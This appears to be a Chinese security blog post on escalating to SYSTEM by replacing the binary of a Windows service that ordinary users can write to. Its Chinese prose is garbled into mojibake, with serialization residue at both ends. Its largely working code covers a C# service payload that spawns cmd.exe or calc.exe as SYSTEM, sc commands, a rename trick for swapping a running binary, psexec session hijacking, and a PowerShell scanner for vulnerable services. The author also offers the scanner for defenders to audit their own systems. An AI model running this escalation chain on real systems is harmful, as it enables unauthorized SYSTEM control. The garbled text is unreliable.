I"›:<h2 id="0x00-å‰è¨€">0x00 å‰è¨€</h2>
<hr />

<p>ä»DidierStevensçš„åšå®¢å­¦åˆ°äº†ä¸€äº›æŠ€å·§ï¼Œæœ¬æ–‡å°†è¦å¯¹å…¶ä¸­æ¶‰åŠåˆ°çš„æŠ€å·§è¿›è¡Œæµ‹è¯•æ€»ç»“ï¼Œå¹¶å¼€æºä¸€ä¸ªpowershellè„šæœ¬ï¼Œç”¨æ¥å¯»æ‰¾å¯è¢«æ›¿æ¢çš„æœåŠ¡ï¼Œå®ç°è‡ªåŠ¨åŒ–åˆ©ç”¨ã€‚</p>

<p>DidierStevensçš„åšå®¢é“¾æ¥ï¼š</p>

<p>https://blog.didierstevens.com/2017/09/05/abusing-a-writable-windows-service/</p>

<h2 id="0x01-ç®€ä»‹">0x01 ç®€ä»‹</h2>
<hr />

<p>æœ¬æ–‡å°†è¦ä»‹ç»ä»¥ä¸‹å†…å®¹ï¼š</p>

<ul>
  <li>ä½¿ç”¨c#ç¼–å†™å¯ä¾›WindowsæœåŠ¡è°ƒç”¨çš„ç¨‹åº</li>
  <li>psexecçš„-iå‚æ•°ä½¿ç”¨æŠ€å·§</li>
  <li>scå‘½ä»¤ä½¿ç”¨æŠ€å·§</li>
  <li>é€šè¿‡powershellè·å–æœåŠ¡å¯¹åº”çš„å¯æ‰§è¡Œæ–‡ä»¶è·¯å¾„</li>
  <li>è‡ªåŠ¨åŒ–åˆ©ç”¨è„šæœ¬å¼€å‘ç»†èŠ‚</li>
</ul>

<h2 id="0x02-ä½¿ç”¨cç¼–å†™å¯ä¾›windowsæœåŠ¡è°ƒç”¨çš„ç¨‹åº">0x02 ä½¿ç”¨c#ç¼–å†™å¯ä¾›WindowsæœåŠ¡è°ƒç”¨çš„ç¨‹åº</h2>
<hr />

<p>å¯ä¾›WindowsæœåŠ¡è°ƒç”¨çš„ç¨‹åºéœ€è¦èƒ½å¤ŸåŒSCM(Services Control Manager)è¿›è¡Œäº¤äº’ï¼Œæ‰€ä»¥åœ¨ç¨‹åºç¼–å†™ä¸Šéœ€è¦æ³¨æ„</p>

<p>Didier Stevensåœ¨åšå®¢ä¸­ç»™å‡ºäº†c#å¼€å‘çš„æ¨¡æ¿ï¼Œä»£ç å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>using System.ServiceProcess;
 
namespace Demo
{
    public class Service : ServiceBase
    {
        protected override void OnStart(string[] args)
        {
            System.Diagnostics.Process.Start("cmd.exe");
        }
    }
 
    static class Program { static void Main() { ServiceBase.Run(new ServiceBase[] { new Service() }); } }
}
</code></pre></div></div>

<p>ç”±äºæ˜¯c#ä»£ç ï¼Œå¯ä»¥ç›´æ¥ç”¨csc.exeè¿›è¡Œç¼–è¯‘</p>

<p>æ‰€ä»¥åœ¨å®é™…ä½¿ç”¨çš„è¿‡ç¨‹ï¼Œä¸éœ€è¦æå‰ç¼–è¯‘å¥½exeï¼Œåªéœ€è¦å°†csè„šæœ¬ä¸Šä¼ ï¼Œå†ä½¿ç”¨csc.exeç¼–è¯‘æˆexeå³å¯</p>

<h2 id="0x03-scå‘½ä»¤ä½¿ç”¨æŠ€å·§">0x03 scå‘½ä»¤ä½¿ç”¨æŠ€å·§</h2>
<hr />

<p>æŸ¥è¯¢æ‰€æœ‰æœåŠ¡åˆ—è¡¨ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sc query  
</code></pre></div></div>

<p>æŸ¥è¯¢æŒ‡å®šæœåŠ¡é…ç½®ä¿¡æ¯ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sc qc æœåŠ¡å 
</code></pre></div></div>

<p>åˆ›å»ºæœåŠ¡ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sc create Test type= own binpath= c:\test\test.exe
</code></pre></div></div>

<p>åˆ é™¤æœåŠ¡ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sc delete æœåŠ¡å
</code></pre></div></div>

<h2 id="0x04-é€šè¿‡powershellè·å–æœåŠ¡å¯¹åº”çš„å¯æ‰§è¡Œæ–‡ä»¶è·¯å¾„">0x04 é€šè¿‡powershellè·å–æœåŠ¡å¯¹åº”çš„å¯æ‰§è¡Œæ–‡ä»¶è·¯å¾„</h2>
<hr />

<p>Didier Stevensåœ¨åšå®¢ä¸­è¯´ä»–æœ‹å‹æ‰¾åˆ°äº†ä¸€ä¸ªå¯å†™çš„WindowsæœåŠ¡ï¼Œå¹¶ä¸”åªéœ€è¦æ™®é€šç”¨æˆ·æƒé™ï¼Œäºæ˜¯ï¼Œè‡ªç„¶å°±æƒ³åˆ°äº†æˆ‘ä»¬è‡ªå·±èƒ½å¦ä¹Ÿæ‰¾åˆ°è¿™ä¸ªæœåŠ¡</p>

<p>é€šè¿‡sc queryèƒ½å¤Ÿåˆ—ä¸¾å‡ºæ‰€æœ‰æœåŠ¡åç§°ï¼Œå†é€šè¿‡sc qc æœåŠ¡å æŸ¥è¯¢åˆ°è¯¥æœåŠ¡å¯¹åº”çš„å¯æ‰§è¡Œæ–‡ä»¶è·¯å¾„</p>

<p>ä¾‹å¦‚ï¼š<code class="language-plaintext highlighter-rouge">sc qc eventlog</code></p>

<p>å¦‚ä¸‹å›¾ï¼ŒeventlogæœåŠ¡å¯¹åº”å¯æ‰§è¡Œæ–‡ä»¶è·¯å¾„ä¸º<code class="language-plaintext highlighter-rouge">C:\Windows\System32\svchost.exe</code></p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2017-9-7/2-1.png" alt="Alt text" /></p>

<p>å¯ä»¥æ‰‹åŠ¨å»æŸ¥æ‰¾æ¯ä¸ªæœåŠ¡å¯¹åº”çš„å¯æ‰§è¡Œæ–‡ä»¶è·¯å¾„ï¼Œçœ‹æ˜¯å¦å­˜åœ¨ç¬¦åˆè¦æ±‚çš„è·¯å¾„ï¼ˆå³æ™®é€šç”¨æˆ·å¯å†™çš„æƒé™ï¼‰</p>

<p>å½“ç„¶ï¼Œè¯¥è¿‡ç¨‹è€—æ—¶è€—åŠ›ï¼Œæœ€å¥½é€šè¿‡ç¼–å†™ç¨‹åºæ¥å®ç°</p>

<p>åœ¨Windowsç³»ç»Ÿä¸‹ï¼Œæœ€ç®€å•é«˜æ•ˆçš„å¼€å‘è¯­è¨€è¿˜æ˜¯powershellï¼Œäºæ˜¯å†³å®šä½¿ç”¨powershellæ¥å®ç°è‡ªåŠ¨åŒ–åˆ¤æ–­</p>

<p>ä½†æ˜¯ï¼Œscè¿™ä¸ªå‘½ä»¤ä¸èƒ½ç›´æ¥åœ¨psé‡Œé¢è¿è¡Œï¼Œpsä¼šæŠŠå®ƒå½“ä½œset-contentçš„åˆ«å</p>

<p><strong>æ³¨ï¼š</strong></p>

<p>å¯é€šè¿‡ä½¿ç”¨sc.exeåœ¨psé‡Œé¢è¿è¡Œscå‘½ä»¤,ä¾‹å¦‚<code class="language-plaintext highlighter-rouge">sc.exe qc eventlog</code></p>

<p><strong>è§£å†³æ–¹æ³•ï¼š</strong></p>

<p>è°ƒç”¨WMIæ¥å®ç°ï¼Œä»£ç å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-WmiObject win32_service | select Name,PathName
</code></pre></div></div>

<p>å¦‚ä¸‹å›¾ï¼Œèƒ½å¤Ÿåˆ—ä¸¾æœåŠ¡å’Œå¯¹åº”çš„å¯æ‰§è¡Œæ–‡ä»¶è·¯å¾„</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2017-9-7/2-2.png" alt="Alt text" /></p>

<h2 id="0x05-è‡ªåŠ¨åŒ–åˆ©ç”¨è„šæœ¬å¼€å‘ç»†èŠ‚">0x05 è‡ªåŠ¨åŒ–åˆ©ç”¨è„šæœ¬å¼€å‘ç»†èŠ‚</h2>
<hr />

<p>ä¸‹é¢ä»‹ç»è‡ªåŠ¨åŒ–è„šæœ¬çš„å¼€å‘ç»†èŠ‚ï¼Œæ€è·¯å¦‚ä¸‹ï¼š</p>

<p>åˆ—ä¸¾å‡ºæœåŠ¡å’Œå¯¹åº”çš„å¯æ‰§è¡Œæ–‡ä»¶è·¯å¾„åï¼Œå¯¹æ¯ä¸€ä¸ªè·¯å¾„è¿›è¡Œæå–ï¼Œåˆ¤æ–­è¯¥è·¯å¾„æ˜¯å¦å…·æœ‰æ™®é€šç”¨æˆ·å¯å†™çš„æƒé™</p>

<h3 id="1è·å–æ‰€æœ‰å¯æ‰§è¡Œæ–‡ä»¶è·¯å¾„">1ã€è·å–æ‰€æœ‰å¯æ‰§è¡Œæ–‡ä»¶è·¯å¾„</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-WmiObject win32_service | select Name,PathName
</code></pre></div></div>

<h3 id="2å°†å¯æ‰§è¡Œæ–‡ä»¶è·¯å¾„è½¬æ¢ä¸ºæ•°ç»„">2ã€å°†å¯æ‰§è¡Œæ–‡ä»¶è·¯å¾„è½¬æ¢ä¸ºæ•°ç»„</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$out = (Get-WmiObject win32_service | select PathName)
$out|% {[array]$global:path += $_.PathName}
</code></pre></div></div>

<p>æ•°ç»„èŒƒå›´ï¼š</p>

<p><code class="language-plaintext highlighter-rouge">$out[0]</code>è‡³<code class="language-plaintext highlighter-rouge">$out[($out.Count-1)]</code></p>

<p>å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2017-9-7/2-3.png" alt="Alt text" /></p>

<h3 id="3æˆªå–è·¯å¾„æ˜¾ç¤ºå•ä¸ªæ•°ç»„çš„æ–‡ä»¶å¤¹">3ã€æˆªå–è·¯å¾„,æ˜¾ç¤ºå•ä¸ªæ•°ç»„çš„æ–‡ä»¶å¤¹</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$out[0].PathName.Substring($out[0].PathName.IndexOfAny("C"),$out[0].PathName.LastIndexOfAny("\"))
</code></pre></div></div>

<p>å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2017-9-7/2-4.png" alt="Alt text" /></p>

<h3 id="4ä¸ºäº†æ ¼å¼ç»Ÿä¸€å°†å­—ç¬¦ä¸²éƒ½è½¬æ¢ä¸ºå¤§å†™">4ã€ä¸ºäº†æ ¼å¼ç»Ÿä¸€ï¼Œå°†å­—ç¬¦ä¸²éƒ½è½¬æ¢ä¸ºå¤§å†™</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$out[0].PathName.ToUpper().Substring($out[0].PathName.ToUpper().IndexOfAny("C"),$out[0].PathName.ToUpper().LastIndexOfAny("\"))
</code></pre></div></div>

<h3 id="5æšä¸¾æ‰€æœ‰æˆªå–è¿‡çš„æ–‡ä»¶å¤¹">5ã€æšä¸¾æ‰€æœ‰æˆªå–è¿‡çš„æ–‡ä»¶å¤¹</h3>

<p>ä½¿ç”¨foreachå¾ªç¯ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>foreach ($item in $out) 
{
	$item.PathName.ToUpper().Substring($item.PathName.ToUpper().IndexOfAny("C"),$item.PathName.ToUpper().LastIndexOfAny("\"))
}
</code></pre></div></div>

<p>å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2017-9-7/2-5.png" alt="Alt text" /></p>

<p>ä¹Ÿå¯ä½¿ç”¨forå¾ªç¯ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>for($i=0;$i -le $out.Count-1;$i++)
{
    $out[$i].PathName.ToUpper().Substring($out[$i].PathName.ToUpper().IndexOfAny("C"),$out[$i].PathName.ToUpper().LastIndexOfAny("\"))
}
</code></pre></div></div>

<h3 id="6è·å–æ–‡ä»¶å¤¹æƒé™">6ã€è·å–æ–‡ä»¶å¤¹æƒé™</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$a=$out[$i].PathName.ToUpper().Substring($out[$i].PathName.ToUpper().IndexOfAny("C"),$out[$i].PathName.ToUpper().LastIndexOfAny("\"))
Get-Acl -Path $a |select Owner
</code></pre></div></div>

<p>ä»¥ä¸‹ä¸‰ä¸ªæƒé™ä»£è¡¨ç®¡ç†å‘˜æƒé™ï¼Œä¸ç¬¦åˆè¦æ±‚ï¼š</p>

<ul>
  <li>NT AUTHORITY\SYSTEM</li>
  <li>NT SERVICE\TrustedInstaller</li>
  <li>BUILTIN\Administrators</li>
</ul>

<p>å› æ­¤è¦å¯¹å…¶å‰”é™¤,å‰©ä¸‹çš„æƒé™ä»£è¡¨å½“å‰ç”¨æˆ·ï¼Œå¯¹åº”ä»£ç ä¸ºï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>If($a.Owner -ne "NT AUTHORITY\SYSTEM"){
	If($a.Owner -ne "NT SERVICE\TrustedInstaller"){
		If($a.Owner -ne "BUILTIN\Administrators"){
			$a.Owner	
		}	
	}
}
</code></pre></div></div>

<h3 id="7ç­›é€‰ç¬¦åˆæ¡ä»¶çš„æœåŠ¡åé‡æ–°æŸ¥æ‰¾æ‰¾åˆ°å½“å‰ç”¨æˆ·æƒé™å¯¹åº”çš„æœåŠ¡åç§°å’Œè·¯å¾„">7ã€ç­›é€‰ç¬¦åˆæ¡ä»¶çš„æœåŠ¡åï¼Œé‡æ–°æŸ¥æ‰¾ï¼Œæ‰¾åˆ°å½“å‰ç”¨æˆ·æƒé™å¯¹åº”çš„æœåŠ¡åç§°å’Œè·¯å¾„</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Get-WmiObject win32_service | ?{$_.PathName -like $out[$i].PathName}|select Name,PathName
</code></pre></div></div>

<h3 id="8å¦‚æœåœ¨ç³»ç»Ÿæœªæ‰¾åˆ°å¯åˆ©ç”¨çš„æœåŠ¡è„šæœ¬ä¼šæŠ¥é”™æç¤ºä¸èƒ½å¯¹-null-å€¼è¡¨è¾¾å¼è°ƒç”¨æ–¹æ³•">8ã€å¦‚æœåœ¨ç³»ç»Ÿæœªæ‰¾åˆ°å¯åˆ©ç”¨çš„æœåŠ¡ï¼Œè„šæœ¬ä¼šæŠ¥é”™ï¼Œæç¤ºä¸èƒ½å¯¹ Null å€¼è¡¨è¾¾å¼è°ƒç”¨æ–¹æ³•</h3>

<p>å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2017-9-7/2-6.png" alt="Alt text" /></p>

<p>ä½¿ç”¨<code class="language-plaintext highlighter-rouge">$ErrorActionPreference="SilentlyContinue"</code>éšè—é”™è¯¯ä¿¡æ¯ï¼Œé”™è¯¯ä¿¡æ¯å†™å…¥<code class="language-plaintext highlighter-rouge">$Error</code>å˜é‡</p>

<p>ç»¼ä¸Šï¼Œå¯¹è¾“å‡ºæ ¼å¼è¿›è¡Œä¼˜åŒ–ï¼Œå®Œæ•´ä»£ç å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ErrorActionPreference="SilentlyContinue"
$out = (Get-WmiObject win32_service | select PathName)
$out|% {[array]$global:path += $_.PathName}
for($i=0;$i -le $out.Count-1;$i++)
{
    $a=Get-Acl -Path $out[$i].PathName.ToUpper().Substring($out[$i].PathName.ToUpper().IndexOfAny("C"),$out[$i].PathName.ToUpper().LastIndexOfAny("\"))
 	If($a.Owner -ne "NT AUTHORITY\SYSTEM"){
		If($a.Owner -ne "NT SERVICE\TrustedInstaller"){
			If($a.Owner -ne "BUILTIN\Administrators"){				
				Get-WmiObject win32_service | ?{$_.PathName -like $out[$i].PathName}|select Name,PathName,ProcessId,StartMode,State,Status
				Write-host Owner: $a.Owner
			}	
		}
    }
}
Write-host [+] All done.
</code></pre></div></div>

<h2 id="0x06-å®é™…æµ‹è¯•">0x06 å®é™…æµ‹è¯•</h2>
<hr />

<h3 id="1æ‰‹åŠ¨åˆ›å»ºæœåŠ¡test">1ã€æ‰‹åŠ¨åˆ›å»ºæœåŠ¡Test</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sc create Test type= own binpath= c:\test\test.exe
</code></pre></div></div>

<h3 id="2ç¼–è¯‘ç”Ÿæˆexe">2ã€ç¼–è¯‘ç”Ÿæˆexe</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>using System.ServiceProcess;
namespace Demo
{
    public class Service : ServiceBase
    {
        protected override void OnStart(string[] args)
        {
            System.Diagnostics.Process.Start("calc.exe");
        }
    }
    static class Program { static void Main() { ServiceBase.Run(new ServiceBase[] { new Service() }); } }
}
</code></pre></div></div>

<p>ä¿å­˜ä¸ºtest.cs</p>

<p>ä½¿ç”¨csc.exeç¼–è¯‘ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe test.cs
</code></pre></div></div>

<p>ç”Ÿæˆtest.exe</p>

<h3 id="3å¯åŠ¨æœåŠ¡">3ã€å¯åŠ¨æœåŠ¡</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sc start Test
</code></pre></div></div>

<p>æŸ¥çœ‹è¿›ç¨‹ï¼Œèƒ½å¤Ÿçœ‹åˆ°calc.exeè¿›ç¨‹å¯åŠ¨ï¼Œæƒé™ä¸ºsystemï¼Œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2017-9-7/3-1.png" alt="Alt text" /></p>

<h3 id="4æ›¿æ¢testexe">4ã€æ›¿æ¢test.exe</h3>

<p>åœ¨å®é™…æƒ…å†µï¼Œå¦‚æœæ²¡æœ‰è·å¾—ç®¡ç†å‘˜æƒé™ï¼Œé‚£ä¹ˆæ— æ³•å¯åŠ¨å’Œåœæ­¢æœåŠ¡</p>

<p>å¦‚æœä¸åœæ­¢æœåŠ¡ï¼Œå°±æ— æ³•ç›´æ¥åˆ é™¤exeï¼Œæç¤ºæ‹’ç»è®¿é—®</p>

<p>ä½†å¯ä»¥å°†è¯¥æ–‡ä»¶é‡å‘½åï¼Œç›¸å½“äºå˜ç›¸åˆ é™¤è¯¥æ–‡ä»¶ï¼Œå°†æ–°æ–‡ä»¶å†å‘½åä¸ºtest.exe</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>rename test.exe test2.exe
</code></pre></div></div>

<p>è¿™æ ·å°±å¯ä»¥åœ¨ä¸åœæ­¢æœåŠ¡çš„æƒ…å†µä¸‹å®ç°æ–‡ä»¶æ›¿æ¢ï¼Œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2017-9-7/3-2.png" alt="Alt text" /></p>

<h3 id="5é‡å¯æœåŠ¡">5ã€é‡å¯æœåŠ¡</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sc stop Test
sc start Test
</code></pre></div></div>

<p>å½“ç„¶ï¼Œè¯¥æ“ä½œéœ€è¦ç®¡ç†å‘˜æƒé™</p>

<h3 id="6psexecçš„-iå‚æ•°ä½¿ç”¨æŠ€å·§">6ã€psexecçš„-iå‚æ•°ä½¿ç”¨æŠ€å·§</h3>

<p>ç”±äºæœåŠ¡å¯åŠ¨çš„exeä¸ºsystemæƒé™ï¼Œé»˜è®¤ä¸ºsession 0ï¼Œè€Œç”¨æˆ·ç•Œé¢ä¸ºsession 1ï¼Œæ‰€ä»¥çœ‹ä¸åˆ°å¯åŠ¨çš„exeç•Œé¢</p>

<p>å¯é€šè¿‡psexecæŒ‡å®šå¯åŠ¨exeçš„sessionï¼Œè¿™æ ·å°±èƒ½è·å–åˆ°ç¨‹åºç•Œé¢</p>

<p>test.csä¿®æ”¹å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>using System.ServiceProcess;
namespace Demo
{
    public class Service : ServiceBase
    {
        protected override void OnStart(string[] args)
        {
            System.Diagnostics.Process.Start(@"c:\test\psexec.exe", @"-accepteula -d -i 1 calc.exe");
        }
    }
    static class Program { static void Main() { ServiceBase.Run(new ServiceBase[] { new Service() }); } }
}
</code></pre></div></div>

<p>åœæ­¢æœåŠ¡ï¼š <code class="language-plaintext highlighter-rouge">sc stop Test</code></p>

<p>åˆ é™¤æ–‡ä»¶ï¼š <code class="language-plaintext highlighter-rouge">del test.exe</code></p>

<p>ç¼–è¯‘æ–‡ä»¶ï¼š <code class="language-plaintext highlighter-rouge">C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe test.cs</code></p>

<p>å°†psexecä¿å­˜åœ¨c:\test</p>

<p>å¯åŠ¨æœåŠ¡ï¼š <code class="language-plaintext highlighter-rouge">sc start Test</code></p>

<p>æ­¤æ—¶ï¼Œèƒ½å¤Ÿçœ‹åˆ°systemæƒé™calc.exeçš„ç•Œé¢ï¼Œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2017-9-7/3-3.png" alt="Alt text" /></p>

<h3 id="7ä½¿ç”¨powershellè„šæœ¬æ‰«æ">7ã€ä½¿ç”¨powershellè„šæœ¬æ‰«æ</h3>

<p>å¦‚ä¸‹å›¾ï¼Œæ ‡è®°å‡ºæœåŠ¡å‘½ä»¤å’Œå¯ä¾›æ›¿æ¢çš„è·¯å¾„ï¼Œä¾¿äºè¿›è¡Œæ›¿æ¢</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2017-9-7/3-4.png" alt="Alt text" /></p>

<p>è¯¥è„šæœ¬èƒ½å¤Ÿè‡ªåŠ¨åˆ¤æ–­å½“å‰ç³»ç»Ÿæ˜¯å¦å­˜åœ¨å¯ä¾›åˆ©ç”¨çš„æœåŠ¡</p>

<h2 id="0x07-å°ç»“">0x07 å°ç»“</h2>
<hr />

<p>å¦‚æœæ‰¾åˆ°äº†ä¸€ä¸ªæ™®é€šç”¨æˆ·æƒé™å¯å†™çš„WindowsæœåŠ¡ï¼Œå¯¹å…¶å¯æ‰§è¡Œæ–‡ä»¶è¿›è¡Œæ›¿æ¢ï¼Œé‚£ä¹ˆåœ¨æœåŠ¡é‡å¯åï¼Œå°±èƒ½ä»¥systemæƒé™æ‰§è¡Œæ›¿æ¢åçš„æ–‡ä»¶ï¼Œå¯ç”¨ä½œææƒã€‚</p>

<p>æœ¬æ–‡å¼€æºçš„è„šæœ¬å¯ç”¨æ¥è‡ªåŠ¨æŸ¥æ‰¾å½“å‰ç³»ç»Ÿæ˜¯å¦å­˜åœ¨æ™®é€šç”¨æˆ·æƒé™å¯å†™çš„WindowsæœåŠ¡ï¼Œç«™åœ¨é˜²å¾¡è€…çš„è§’åº¦ï¼Œä¹Ÿå¯ä»¥ç”¨è¯¥è„šæœ¬æµ‹è¯•è‡ªå·±çš„ç³»ç»Ÿã€‚</p>

<hr />

<p><a href="https://github.com/3gstudent/feedback/issues/new">LEAVE A REPLY</a></p>

:ET